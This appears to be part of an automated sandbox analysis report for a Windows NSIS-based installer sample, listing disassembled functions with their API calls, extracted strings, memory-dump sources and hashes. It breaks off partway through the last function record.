Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

detailprint: %s, xrefs: 00401679
Rename failed: %s, xrefs: 0040194B
Rename: %s, xrefs: 004018F8
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
BringToFront, xrefs: 004016BD
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Call: %d, xrefs: 0040165A
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: "%s" created, xrefs: 00401849
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

@%F, xrefs: 004059F6
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D
@rD, xrefs: 00405965
RichEdit, xrefs: 00405BC4
.DEFAULT\Control Panel\International, xrefs: 00405999
RichEd20, xrefs: 00405B9D
B%F, xrefs: 00405A1F
RichEd32, xrefs: 00405BA8
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
RichEdit20A, xrefs: 00405BB6, 00405BBB

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,PetFunctions,PetFunctions,00000000,00000000,PetFunctions,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
PetFunctions, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$PetFunctions
API String ID: 4286501637-2463230398
Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
P1B, xrefs: 004033A9

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(007E1ED0), ref: 00402387

Strings

PetFunctions, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$PetFunctions$Pop: stack empty
API String ID: 1459762280-1025396974
Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(007E1ED0), ref: 00402387

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
